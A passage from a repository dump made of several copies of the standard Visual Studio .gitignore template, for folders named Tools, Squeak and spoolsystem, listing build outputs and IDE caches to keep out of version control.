24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to checkin your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary however generally it will be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produces more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
227 | # Including strong name files can present a security risk
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
--------------------------------------------------------------------------------
/Tools/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to checkin your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary however generally it will be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produces more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
227 | # Including strong name files can present a security risk
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
341 |
342 | .DS_Store
343 |
--------------------------------------------------------------------------------
/Tools/Squeak/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to checkin your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary however generally it will be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produces more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
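227 | # Including strong name key files in the repository can present a security risk; the *.snk pattern below ships commented out, so uncomment it to keep them untracked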
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
341 |
342 | .DS_Store
343 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | [Aa][Rr][Mm]/
24 | [Aa][Rr][Mm]64/
25 | bld/
26 | [Bb]in/
27 | [Oo]bj/
28 | [Ll]og/
29 |
30 | # Visual Studio 2015/2017 cache/options directory
31 | .vs/
32 | # Uncomment if you have tasks that create the project's static files in wwwroot
33 | #wwwroot/
34 |
35 | # Visual Studio 2017 auto generated files
36 | Generated\ Files/
37 |
38 | # MSTest test Results
39 | [Tt]est[Rr]esult*/
40 | [Bb]uild[Ll]og.*
41 |
42 | # NUNIT
43 | *.VisualState.xml
44 | TestResult.xml
45 |
46 | # Build Results of an ATL Project
47 | [Dd]ebugPS/
48 | [Rr]eleasePS/
49 | dlldata.c
50 |
51 | # Benchmark Results
52 | BenchmarkDotNet.Artifacts/
53 |
54 | # .NET Core
55 | project.lock.json
56 | project.fragment.lock.json
57 | artifacts/
58 |
59 | # StyleCop
60 | StyleCopReport.xml
61 |
62 | # Files built by Visual Studio
63 | *_i.c
64 | *_p.c
65 | *_h.h
66 | *.ilk
67 | *.meta
68 | *.obj
69 | *.iobj
70 | *.pch
71 | *.pdb
72 | *.ipdb
73 | *.pgc
74 | *.pgd
75 | *.rsp
76 | *.sbr
77 | *.tlb
78 | *.tli
79 | *.tlh
80 | *.tmp
81 | *.tmp_proj
82 | *_wpftmp.csproj
83 | *.log
84 | *.vspscc
85 | *.vssscc
86 | .builds
87 | *.pidb
88 | *.svclog
89 | *.scc
90 |
91 | # Chutzpah Test files
92 | _Chutzpah*
93 |
94 | # Visual C++ cache files
95 | ipch/
96 | *.aps
97 | *.ncb
98 | *.opendb
99 | *.opensdf
100 | *.sdf
101 | *.cachefile
102 | *.VC.db
103 | *.VC.VC.opendb
104 |
105 | # Visual Studio profiler
106 | *.psess
107 | *.vsp
108 | *.vspx
109 | *.sap
110 |
111 | # Visual Studio Trace Files
112 | *.e2e
113 |
114 | # TFS 2012 Local Workspace
115 | $tf/
116 |
117 | # Guidance Automation Toolkit
118 | *.gpState
119 |
120 | # ReSharper is a .NET coding add-in
121 | _ReSharper*/
122 | *.[Rr]e[Ss]harper
123 | *.DotSettings.user
124 |
125 | # JustCode is a .NET coding add-in
126 | .JustCode
127 |
128 | # TeamCity is a build add-in
129 | _TeamCity*
130 |
131 | # DotCover is a Code Coverage Tool
132 | *.dotCover
133 |
134 | # AxoCover is a Code Coverage Tool
135 | .axoCover/*
136 | !.axoCover/settings.json
137 |
138 | # Visual Studio code coverage results
139 | *.coverage
140 | *.coveragexml
141 |
142 | # NCrunch
143 | _NCrunch_*
144 | .*crunch*.local.xml
145 | nCrunchTemp_*
146 |
147 | # MightyMoose
148 | *.mm.*
149 | AutoTest.Net/
150 |
151 | # Web workbench (sass)
152 | .sass-cache/
153 |
154 | # Installshield output folder
155 | [Ee]xpress/
156 |
157 | # DocProject is a documentation generator add-in
158 | DocProject/buildhelp/
159 | DocProject/Help/*.HxT
160 | DocProject/Help/*.HxC
161 | DocProject/Help/*.hhc
162 | DocProject/Help/*.hhk
163 | DocProject/Help/*.hhp
164 | DocProject/Help/Html2
165 | DocProject/Help/html
166 |
167 | # Click-Once directory
168 | publish/
169 |
170 | # Publish Web Output
171 | *.[Pp]ublish.xml
172 | *.azurePubxml
173 | # Note: Comment the next line if you want to checkin your web deploy settings,
174 | # but database connection strings (with potential passwords) will be unencrypted
175 | *.pubxml
176 | *.publishproj
177 |
178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
179 | # checkin your Azure Web App publish settings, but sensitive information contained
180 | # in these scripts will be unencrypted
181 | PublishScripts/
182 |
183 | # NuGet Packages
184 | *.nupkg
185 | # The packages folder can be ignored because of Package Restore
186 | **/[Pp]ackages/*
187 | # except build/, which is used as an MSBuild target.
188 | !**/[Pp]ackages/build/
189 | # Uncomment if necessary however generally it will be regenerated when needed
190 | #!**/[Pp]ackages/repositories.config
191 | # NuGet v3's project.json files produces more ignorable files
192 | *.nuget.props
193 | *.nuget.targets
194 |
195 | # Microsoft Azure Build Output
196 | csx/
197 | *.build.csdef
198 |
199 | # Microsoft Azure Emulator
200 | ecf/
201 | rcf/
202 |
203 | # Windows Store app package directories and files
204 | AppPackages/
205 | BundleArtifacts/
206 | Package.StoreAssociation.xml
207 | _pkginfo.txt
208 | *.appx
209 |
210 | # Visual Studio cache files
211 | # files ending in .cache can be ignored
212 | *.[Cc]ache
213 | # but keep track of directories ending in .cache
214 | !?*.[Cc]ache/
215 |
216 | # Others
217 | ClientBin/
218 | ~$*
219 | *~
220 | *.dbmdl
221 | *.dbproj.schemaview
222 | *.jfm
223 | *.pfx
224 | *.publishsettings
225 | orleans.codegen.cs
226 |
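227 | # Including strong name key files in the repository can present a security risk; the *.snk pattern below ships commented out, so uncomment it to keep them untracked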
228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
229 | #*.snk
230 |
231 | # Since there are multiple workflows, uncomment next line to ignore bower_components
232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
233 | #bower_components/
234 |
235 | # RIA/Silverlight projects
236 | Generated_Code/
237 |
238 | # Backup & report files from converting an old project file
239 | # to a newer Visual Studio version. Backup files are not needed,
240 | # because we have git ;-)
241 | _UpgradeReport_Files/
242 | Backup*/
243 | UpgradeLog*.XML
244 | UpgradeLog*.htm
245 | ServiceFabricBackup/
246 | *.rptproj.bak
247 |
248 | # SQL Server files
249 | *.mdf
250 | *.ldf
251 | *.ndf
252 |
253 | # Business Intelligence projects
254 | *.rdl.data
255 | *.bim.layout
256 | *.bim_*.settings
257 | *.rptproj.rsuser
258 | *- Backup*.rdl
259 |
260 | # Microsoft Fakes
